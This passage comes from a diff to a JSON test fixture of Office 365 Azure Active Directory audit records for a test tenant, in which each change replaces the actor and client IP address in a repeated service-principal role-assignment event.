b9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.2593808Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117959\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a73c1c7e-5591-4912-94cc-527ad6f48ed8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.2593808Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117959\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a73c1c7e-5591-4912-94cc-527ad6f48ed8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -15114,9 +15114,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:30:06", "ExtendedProperties": [ { @@ -15350,7 +15350,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.2593808Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117959\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a73c1c7e-5591-4912-94cc-527ad6f48ed8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.2593808Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117959\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a73c1c7e-5591-4912-94cc-527ad6f48ed8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -15380,9 +15380,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:30:06", "ExtendedProperties": [ { @@ -15616,7 +15616,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 